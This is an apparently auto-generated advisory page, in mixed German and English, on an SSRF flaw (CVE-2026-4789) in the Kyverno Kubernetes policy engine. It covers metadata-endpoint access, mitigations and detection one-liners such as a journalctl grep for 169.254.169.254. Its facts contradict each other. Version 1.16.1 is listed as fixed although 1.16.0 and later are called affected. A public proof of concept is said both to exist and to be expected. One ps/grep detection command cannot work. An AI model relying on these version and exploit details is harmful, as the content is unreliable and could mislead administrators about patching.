Plattform
go
Komponente
github.com/kyverno/kyverno
Behoben in
1.16.1
1.17.2
1.17.0
CVE-2026-4789 describes a Server-Side Request Forgery (SSRF) vulnerability discovered in Kyverno, a Kubernetes-native policy engine. This flaw allows users with namespace-scoped policy creation permissions to initiate arbitrary HTTP requests through the Kyverno admission controller, potentially leading to unauthorized access and data exfiltration. The vulnerability impacts Kyverno versions 1.16.0 and later, with testing performed on version 1.16.2. A fix is available in version 1.17.0.
The SSRF vulnerability in Kyverno allows an attacker with namespace-scoped policy creation permissions to craft malicious policies that make arbitrary HTTP requests. These requests originate from the Kyverno admission controller, effectively bypassing network segmentation and allowing access to resources that would normally be inaccessible. Specifically, an attacker could target internal services running within the Kubernetes cluster, potentially gaining unauthorized access to sensitive data or control. Furthermore, the vulnerability enables access to cloud metadata endpoints (e.g., 169.254.169.254 in AWS), which can expose credentials and configuration information. Data exfiltration is possible by embedding the results of these requests within policy error messages, effectively leaking data outside the cluster.
This vulnerability was publicly disclosed on April 14, 2026. Its severity is rated HIGH (CVSS: 8.5). There are currently no known active exploitation campaigns targeting this vulnerability, but the availability of a public proof-of-concept increases the risk. The vulnerability is not currently listed on the CISA KEV catalog. Public proof-of-concept exploits are expected to emerge as the vulnerability gains wider awareness.
Organizations using Kyverno for policy enforcement in Kubernetes clusters are at risk, particularly those running versions 1.16.0 and above. Environments with extensive internal services and cloud integrations are especially vulnerable, as the SSRF vulnerability can be used to access sensitive data and credentials. Shared Kubernetes clusters with multiple namespaces and varying permission levels also increase the risk.
• linux / server:
journalctl -u kyverno -g 'http.Get' | grep -i '169.254.169.254'• linux / server:
ps aux | grep kyverno | grep 'http.Get' • generic web:
curl -I <kyverno_admission_controller_endpoint> | grep 'Server: kyverno'disclosure
Exploit-Status
EPSS
0.02% (5% Perzentil)
CVSS-Vektor
The primary mitigation for CVE-2026-4789 is to upgrade Kyverno to version 1.17.0 or later, which contains the fix. If upgrading immediately is not feasible, consider implementing temporary workarounds. Restrict network access to the Kyverno admission controller to only necessary services. Implement network policies to limit the ability of Kyverno pods to make outbound requests. Monitor Kyverno logs for unusual HTTP requests originating from policy evaluations. While a WAF or proxy cannot directly prevent this SSRF, it can help detect and block suspicious outbound traffic patterns. No specific Sigma or YARA rules are readily available, but monitoring HTTP requests for unusual destinations is recommended.
Aktualisieren Sie Kyverno auf eine Version, die neuer als 1.16.0 ist, um die SSRF-Schwachstelle zu beheben. Dies verhindert die uneingeschränkte Verwendung von CEL HTTP-Funktionen und schützt vor möglichen SSRF-Angriffen.
Schwachstellenanalysen und kritische Warnungen direkt in deinen Posteingang.
CVE-2026-4789 is a HIGH severity Server-Side Request Forgery (SSRF) vulnerability affecting Kyverno versions 1.16.0 and later. It allows unauthorized access to internal services and cloud metadata.
You are affected if you are running Kyverno version 1.16.0 or later and have not upgraded to version 1.17.0 or a later version. Ensure your Kyverno CRDs are enabled, as this is the default configuration.
Upgrade Kyverno to version 1.17.0 or later. As a temporary workaround, restrict network access and implement strict network policies.
There is currently no evidence of active exploitation, but the vulnerability's nature makes it a potential target.
Refer to the official Kyverno security advisory for detailed information and updates: [https://kyverno.io/security/advisories/kyverno-sa-001/](https://kyverno.io/security/advisories/kyverno-sa-001/)
Lade deine Abhängigkeitsdatei hoch und erfahre sofort, ob dich diese und andere CVEs treffen.
Lade deine go.mod-Datei hoch und wir sagen dir sofort, ob du betroffen bist.